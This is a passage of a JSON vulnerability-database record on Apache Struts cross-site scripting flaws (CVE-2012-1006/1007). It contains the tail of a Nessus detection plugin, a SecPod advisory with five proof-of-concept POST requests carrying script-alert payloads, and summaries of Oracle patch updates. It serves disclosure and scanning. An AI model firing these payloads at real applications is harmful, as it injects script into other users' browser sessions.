http_send_recv3(method:\"GET\", \n port:port, \n item:verify_url, \n exit_on_fail:TRUE);\n if (\n \"upload-submit.do\" >< res[2] && \n \"<title>File Upload Example</title>\" >< res[2]\n )\n {\n bound = \"nessus\";\n boundary = \"--\" + bound;\n postdata = \n boundary + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"theText\"\\r\\n' +\n '\\r\\n' +\n xss_string + '\\r\\n' +\n\n boundary + '\\r\\n' + \n 'Content-Disposition: form-data; name=\"theFile\"; filename=\"\"\\r\\n' +\n 'Content-Type: application/octet-stream\\r\\n' +\n '\\r\\n\\r\\n' +\n\n boundary + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"filePath\"\\r\\n' +\n '\\r\\n\\r\\n' +\n boundary + '--\\r\\n';\n\n attack_url = dir + attack_page;\n\n res = http_send_recv3(method:\"POST\", \n port:port, \n item:attack_url, \n content_type: \"multipart/form-data; boundary=\"+bound,\n data:postdata, \n exit_on_fail:TRUE);\n \n if ('&nbsp;' + xss_string + '<' >< res[2])\n { \n report_requests = make_list(report_requests, http_last_sent_request()); \n output = strstr(res[2], xss_string);\n if (!thorough_tests) break;\n } \n }\n}\n\nif (max_index(report_requests) > 0)\n{\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n generic : TRUE,\n line_limit : 5,\n xss : TRUE, # Sets XSS KB key\n request : report_requests,\n output : chomp(output)\n );\n exit(0);\n}\nelse exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-02T09:45:41", "bulletinFamily": "exploit", "description": "Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities. CVE-2012-1006,CVE-2012-1007. Webapps exploits for multiple platform", "modified": "2012-02-02T00:00:00", "published": "2012-02-02T00:00:00", "id": "EDB-ID:18452", "href": "https://www.exploit-db.com/exploits/18452/", "type": "exploitdb", "title": "Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities", "sourceData": "##############################################################################\r\n#\r\n# Title : Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities\r\n# Author : Antu Sanadi SecPod Technologies (www.secpod.com)\r\n# Vendor : http://struts.apache.org/\r\n# Advisory : http://secpod.org/blog/?p=450\r\n# http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt\r\n# Software : Apache struts 1.3.10, 2.0.14 and 2.2.3\r\n# Date : 01/02/2012\r\n#\r\n##############################################################################\r\n\r\nSecPod ID: 1021\t\t\t\t\t21/07/2011 Issue Discovered\r\n\t\t\t\t\t\t03/08/2011 Vendor Notified\r\n\t\t\t\t\t\tNo Response\r\n\t\t\t\t\t\t01/02/2012 Advisory Released\r\n\r\nClass: Cross-Site Scripting (Persistence)\tSeverity: High\r\n\r\n\r\nOverview:\r\n---------\r\nApache Struts Multiple Persistence Cross-Site Scripting Vulnerabilities.\r\n\r\n\r\nTechnical Description:\r\n----------------------\r\nMultiple persistence Cross-Site Scripting vulnerabilities are present in\r\nApache Struts, as it fails to sanitise user-supplied input.\r\n\r\n i) Input passed via the 'name' and 'lastName' parameter in\r\n '/struts2-showcase/person/editPerson.action' is not properly verified\r\n before it is returned to the user. This can be exploited to execute\r\n arbitrary HTML and script code in a user's browser session in the\r\n context of a vulnerable site.\r\n\r\n ii) Input passed via the 'clientName' parameter in\r\n '/struts2-rest-showcase/orders' action is not properly verified before\r\n it is returned to the user. This can be exploited to execute arbitrary\r\n HTML and script code in a user's browser session in the context of a\r\n vulnerable site.\r\n\r\n iii) Input passed via the 'name' parameter in\r\n '/struts-examples/upload/upload-submit.do?queryParam=Successful' action\r\n is not properly verified before it is returned to the user. This can be\r\n exploited to execute arbitrary HTML and script code in a user's browser\r\n session in the context of a vulnerable site.\r\n\r\n iV) Input passed via the 'message' parameter in\r\n '/struts-cookbook/processSimple.do' action is not properly verified\r\n before it is returned to the user. This can be exploited to execute\r\n arbitrary HTML and script code in a user's browser session in the\r\n context of a vulnerable site.\r\n\r\n V) Input passed via the 'message' parameter in\r\n '/struts-cookbook/processSimple.do' action is not properly verified\r\n before it is returned to the user. This can be exploited to execute\r\n arbitrary HTML and script code in a user's browser session in the\r\n context of a vulnerable site.\r\n\r\n These vulnerabilities have been tested on Apache Struts2 v2.2.3,\r\n Apache Struts2 v2.0.14 and Apache Struts v1.3.10. \r\n Other versions may also be affected.\r\n\r\n\r\nImpact:\r\n--------\r\nSuccessful exploitation could allow an attacker to execute arbitrary HTML\r\ncode in a user's browser session in the context of a vulnerable application.\r\n\r\n\r\nAffected Software:\r\n------------------\r\nApache struts 2.2.3 and prior.\r\n\r\nTested on,\r\n i) Apache struts 2.2.3 - Stored XSS \r\n - struts2-showcase-2.2.3\r\n - struts2-rest-showcase-2.2.3\r\n\r\n ii) Apache struts 2.0.14 - Stored XSS \r\n - struts2-showcase-2.0.14\r\n\r\n iii) Apache struts 1.3.10 - Reflected XSS \r\n - struts-cookbook-1.3.10\r\n - struts-examples-1.3.10\r\n\r\n\r\nReferences:\r\n-----------\r\nhttp://struts.apache.org\r\nhttp://secpod.org/blog/?p=450\r\n\r\n\r\nProof of Concept:\r\n-----------------\r\n\r\nPOC 1:\r\n-----\r\nStored XSS \r\n\r\nPOST struts2-showcase/person/editPerson.action HTTP/1.1\r\n\r\nHost: SERVER_IP:8080\r\nUser-Agent: struts2-showcase XSS-TEST\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 192\r\n\r\nPost Data:\r\n----------\r\npersons%281%29.name=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript\r\n%3E&persons%281%29.lastName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2\r\nFscript%3E&method%3Asave=Save+all+persons\r\n\r\n\r\nPOC 2:\r\n-----\r\nStored XSS \r\n\r\nPOST /struts2-rest-showcase/orders HTTP/1.1\r\n\r\nHost: SERVER_IP:8080\r\nUser-Agent: struts2-rest-showcase XSS-TEST\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 78\r\n\r\nPost Data:\r\n----------\r\nclientName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&amount=\r\n\r\n\r\nPOC 3: \r\n-----\r\nReflected XSS \r\n\r\nPOST /struts-examples/upload/upload-submit.do?queryParam=Successful HTTP/1.1\r\n\r\nHost: SERVER_IP:8080\r\nUser-Agent: Struts-examples XSS-TEST\r\nContent-Type: multipart/form-data; boundary=---------------------------41701\r\n161044225432961947041\r\nContent-Length: 481\r\n\r\nPost Data:\r\n----------\r\n-----------------------------41701161044225432961947041\\r\\n\r\nContent-Disposition: form-data; name=\"theText\"\\r\\n\r\n\\r\\n\r\n<script>alert(\"SecPod-XSS-TEST\")</script>\\r\\n\r\n-----------------------------41701161044225432961947041\\r\\n\r\nContent-Disposition: form-data; name=\"theFile\"; filename=\"\"\\r\\n\r\nContent-Type: application/octet-stream\\r\\n\r\n\\r\\n\r\n\\r\\n\r\n-----------------------------41701161044225432961947041\\r\\n\r\nContent-Disposition: form-data; name=\"filePath\"\\r\\n\r\n\\r\\n\r\n\\r\\n\r\n-----------------------------41701161044225432961947041--\\r\\n\r\n\r\n\r\nPOC 4:\r\n-----\r\nReflected XSS \r\n\r\nPOST /struts-cookbook/processSimple.do HTTP/1.1\r\n\r\nHost: SERVER_IP:8080\r\nUser-Agent:Struts-cookbook XSS-TEST\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 118\r\n\r\nPost Data:\r\n----------\r\nname=XYZ&secret=XYZ&color=red&confirm=on&rating=1&message=%3Cscript%3Ealert\r\n%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&\r\n\r\n\r\nPOC 5:\r\n-----\r\nReflected XSS \r\n\r\nPOST /struts-cookbook/processDyna.do HTTP/1.1\r\n\r\nHost: SERVER_IP:8080\r\nUser-Agent:Struts-cookbook XSS-TEST\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 95\r\n\r\nPost Data:\r\n----------\r\nname=ZYZ&secret=&color=red&message=%3Cscript%3Ealert%28%22SecPod-XSS-TEST\r\n%22%29%3C%2Fscript%3E&\r\n\r\n\r\nSolution:\r\n---------\r\nFix not available\r\n\r\n\r\nRisk Factor:\r\n-------------\r\n CVSS Score Report:\r\n ACCESS_VECTOR = NETWORK\r\n ACCESS_COMPLEXITY = LOW\r\n AUTHENTICATION = NONE\r\n CONFIDENTIALITY_IMPACT = PARTIAL\r\n INTEGRITY_IMPACT = PARTIAL\r\n AVAILABILITY_IMPACT = NONE\r\n EXPLOITABILITY = PROOF_OF_CONCEPT\r\n REMEDIATION_LEVEL = UNAVAILABLE\r\n REPORT_CONFIDENCE = CONFIRMED\r\n CVSS Base Score = 6.4 (High) (AV:N/AC:L/Au:N/C:N/I:P/A:N)\r\n\r\nCredits:\r\n--------\r\nAntu Sanadi of SecPod Technologies has been credited with the discovery of this\r\nvulnerability.\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/18452/"}], "oracle": [{"lastseen": "2018-12-19T04:53:24", "bulletinFamily": "software", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n \n\n * [Critical Patch Updates, Security Alerts and Bulletins](<https://www.oracle.com/securityalerts>) for information about Oracle Security Advisories.\n\n \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 301 new security fixes across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ October 2018 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2456979.1>).\n", "modified": "2018-10-16T00:00:00", "published": "2018-12-18T00:00:00", "id": "ORACLE:CPUOCT2018-4428296", "href": "", "title": "CPU Oct 2018", "type": "oracle", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T04:13:45", "bulletinFamily": "software", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 300 new security fixes across the product families listed below. Please note that a MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [April 2017 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2252203.1>).\n\nPlease note that the vulnerabilities in this Critical Patch Update are scored using version 3.0 of Common Vulnerability Scoring Standard (CVSS).\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available [here](<http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>).\n", "modified": "2017-06-20T00:00:00", "published": "2017-04-18T00:00:00", "id": "ORACLE:CPUAPR2017-3236618", "href": "", "title": "Oracle Critical Patch Update - April 2017", "type": "oracle", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-17T06:21:30", "bulletinFamily": "software", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 253 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\nPlease note that the vulnerabilities in this Critical Patch Update are scored using version 3.0 of Common Vulnerability Scoring Standard (CVSS).\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available [here](<http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>).\n", "modified": "2019-05-16T00:00:00", "published": "2016-10-18T00:00:00", "id": "ORACLE:CPUOCT2016-2881722", "href": "", "title": "Oracle Critical Patch Update - October 2016", "type": "oracle", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}